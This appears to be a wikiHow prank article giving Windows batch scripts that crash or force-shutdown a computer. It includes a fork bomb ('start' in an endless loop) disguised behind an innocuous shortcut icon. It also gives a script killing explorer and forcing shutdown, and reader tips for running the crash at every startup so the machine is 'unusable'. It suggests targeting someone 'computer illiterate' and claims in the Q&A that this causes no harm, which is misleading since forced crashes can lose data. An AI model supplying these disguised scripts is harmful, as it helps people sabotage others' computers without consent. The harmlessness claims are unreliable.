PDF download Download Article
Prank your friends with this Matrix-inspired command prompt
PDF download Download Article

Ever seen the matrix? Well you can utilize a Matrix style code to crash a computer. With this you can play pranks on friends and family.

Things You Should Know

  • Use Notepad to enter the necessary code.
  • Save the file with a .bat extension.
  • Create a shortcut for the file and replace the icon with something innocuous. Clicking the icon will cause the monitor to crash.
Method 1
Method 1 of 2:

Writing a File to Crash the Monitor

PDF download Download Article
  1. In All Programs click Accessories, in Accessories click Notepad. For Windows 7, click Start then type in the search bar at the bottom type; Notepad and press enter.
    Advertisement
  2. @echo off
    color a
    cls
    :top
    start
    goto top
    
  3. For example as cmd_prank.bat.
  4. Right click on the file and click Send To, then Desktop.
  5. Go to the Desktop and right click and go to Properties and Change Icon. Make the icon Internet Explorer or the Documents icon.
  6. To stop this before it happens, pull out the battery or press and hold the power key until it turns off(laptops) or unplug the computer, not the monitor (desktops).
  7. Advertisement
Method 2
Method 2 of 2:

Instantly Shut Down

PDF download Download Article
  1. kill -f explorer.exe
    shutdown -s -f 
    exit
    
  2. In Notepad, press Ctrl+S, then select "Any" as file type, enter a name with a ".bat" extension, for example "Anything.bat", and click on Save.
  3. Advertisement

Community Q&A

Search
Add New Question
  • Question
    Will it harm the computer in any way?
    Community Answer
    Community Answer
    No. It will not harm your computer.
  • Question
    How do I change the message?
    Community Answer
    Community Answer
    Shutdown -s -f -c "Your Comment Here". Replace the "Your Comment Here" with your own message and that's it!
  • Question
    How do I make a batch file that activates on startup?
    Community Answer
    Community Answer
    Open Notepad and type in: @echo off start "" "cmdprank.bat." Save it as any name, but make sure it has .bat or .cmd at the end of the filename. Then, follow Method 1, not Method 2.
See more answers
Ask a Question
200 characters left
Include your email address to get a message when this question is answered.
Submit
Advertisement

Tips

  • Always check your own computer for a desktop file like this, by seeing if it's a shortcut. If it is, right click and click Edit (if possible). If it seems suspicious delete it.
  • Use this on someone who is computer illiterate.

Tips from our Readers

  • If you want to make the computer open this file during startup, just save that file to the Startup folder in your user folder. Then, when the computer starts it will crash and be unusable. However, this won’t work in Safe Mode!
  • Don’t run it on your own computer. Use a virtual PC if you want to test if yourself.
  • Be careful not to save it as a .vir then open it.
Submit a Tip
All tip submissions are carefully reviewed before being published
Name
Please provide your name and last initial
Thanks for submitting a tip for review!
Advertisement

Warnings

Advertisement

You Might Also Like

Crash Your Computer Using a Batch FileCrash Your Computer Using a Batch File
Create a Fake and Harmless VirusCreate a Fake and Harmless Virus
Make an Easy E Bomb Using NotepadMake an Easy E Bomb Using Notepad
Shut Down a Computer Using Notepad Shut Down Your Computer Using a Notepad Bat File
Create a 'Matrix' Falling Code Batch FileCreate a 'Matrix' Falling Code Batch File
Create a Harmless Freeze VirusCreate a Harmless Freeze Virus
Make a Funny Prank VirusMake a Funny Prank Virus
Create the Matrix Rain in Command PromptCreate the Matrix Rain in Command Prompt
Make It Look Like You Are Hacking Make It Look Like You are Hacking
Make a Shutdown Shortcut in Windows Create a Shutdown Shortcut on Your Windows Desktop or Taskbar
Prank Your Friends Prank Somebody
Force a Blue Screen in WindowsForce a Blue Screen in Windows
Make a Video Game With CmdMake a Video Game With Cmd
Shut Down or Restart Another Computer Using CMDShut Down or Restart Another Computer Using CMD
Advertisement

About This Article

wikiHow is a “wiki,” similar to Wikipedia, which means that many of our articles are co-written by multiple authors. To create this article, 18 people, some anonymous, worked to edit and improve it over time. This article has been viewed 98,547 times.
How helpful is this?
Co-authors: 18
Updated: December 31, 2024
Views: 98,547
Thanks to all authors for creating a page that has been read 98,547 times.

Is this article up to date?

Advertisement